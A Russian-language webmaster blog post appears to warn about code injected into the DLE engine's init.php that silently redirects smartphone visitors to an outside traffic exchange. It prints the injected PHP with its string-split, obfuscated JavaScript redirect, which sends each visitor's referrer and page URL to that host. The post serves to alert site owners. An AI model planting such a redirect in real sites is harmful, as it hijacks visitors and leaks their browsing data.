​Незаметное воровство WAP Трафика. Будьте Внимательны!

​Способы которые ранее встречались были только размещение кода в .htaccess или скажем JavaScript кода в файлах. Данный метод оказался совсем другим, более умным и незаметным в каком то смысле. Не каждый же день Вы проверяйте "мобильные версии" своих сайтов ? :)

Воры же эти, постарались маскироватся под пп ZIPWAP.RU. По этому исследование файла проходило с помощью zipwap_ru. Файл, где размешается данный код init.php (движок DLE, /engine/init.php).

Вот часть от кода.

if ( !$_SESSION['mobile_disable'] )  

{ if ( check_smartphone() )  {echo "<s"."cript>window.loc"."ation=(\"ht\"+\"tp:\"+\"//".$zip.$wap.$ru."/user/id?14&seo\"+\"ref=\"+encodeURIComponent(document.referrer)+ \"&para\"+\"meter=$key\"+\"word&se=$se&ur=1&H"."TT"."P_REF"."ERER=\"+enc"."odeURIComponent(docu"."ment.URL));</s"."cript>"; 

 

        if ( @is_dir ( ROOT_DIR . '/templates/smartphone' ) ) { 

 

            $config['skin'] = "smartphone"; 

            $smartphone_detected = true; 

            $config['allow_comments_wysiwyg'] = "no"; 

 

        } 

 

    } 

 

}

Как оказалось, $zip.$wap.$ru."/user/id?14&seo лишь маскировка, на самом деле ссылки ведут на эти страницы.

Ответ zipwap_ru

По адресу http://inclyde.net - чудо биржа трафика. Но кто именно user/id?14 пока не известно.

Спасибо zipwap_ru за оперативные ответы. И еще, коды были размещены на сайтах, где не было редиректа мобильного трафика.

И конечно интересует вопрос: На какую ПП сливался трафик ? Выяснить пока не удалось.

Будьте Внимательны! Проверяйте свои сайты почаще! :)